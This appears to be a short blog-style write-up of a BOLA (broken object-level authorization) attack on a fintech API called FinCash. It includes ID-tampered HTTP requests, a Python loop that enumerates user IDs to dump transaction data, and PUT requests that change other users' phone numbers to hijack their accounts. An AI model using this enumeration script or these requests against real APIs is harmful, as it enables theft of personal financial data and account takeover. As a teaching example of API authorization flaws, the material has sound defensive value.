Hacking a Fintech App via Broken API Authorization.

It started with a simple curiosity.

A bug bounty hunter known as RedFox registered an account on a trendy fintech app called FinCash. The platform allowed users to manage their e-wallets and track payments via a sleek mobile app powered by a modern RESTful API.

🔴 Request to fetch personal transactions

GET /api/v1/users/48392/transactions HTTP/1.1

Authorization: Bearer eyJhbGciOiJIUz...

Nothing unusual… until RedFox changed the user ID in the URL

🔴 Tampered Request

GET /api/v1/users/48393/transactions HTTP/1.1

Authorization: Bearer eyJhbGciOiJIUz...

The API returned data — without validating whether the requester owned user ID 48393. RedFox had discovered a BOLA vulnerability.

🔴 Reconnaissance

RedFox used a Python script to loop through user IDs and extract all available transaction records.

for i in range(48390, 48430).

url = f"https://fincash.app/api/v1/users/{i}/transactions"

headers = {"Authorization": f"Bearer {token}"}

r = requests.get(url, headers=headers)

if r.status_code == 200:

print(f"User {i} =>", r.json())

Within an hour, RedFox had dumped transaction data for hundreds of users, including account balances, timestamps, and transaction IDs.

🔴 Escalation

RedFox got bolder. What if the update API also lacked object-level checks?

Request to update phone number

PUT /api/v1/users/48392/profile

Content-Type: application/json

Authorization: Bearer eyJhbGciOiJIUz...

{

"phone": "+12025551234"

}

He changed the user ID.

🔴 Malicious Request

PUT /api/v1/users/48394/profile

{

"phone": "+19998887777"

}

It worked. RedFox could hijack accounts silently — change their phone numbers, reset passwords, or intercept OTPs.

• PII of 500+ users was exposed

• Several accounts were hijacked before the company detected anomalies

• FinCash was delisted temporarily from app stores pending a security audit.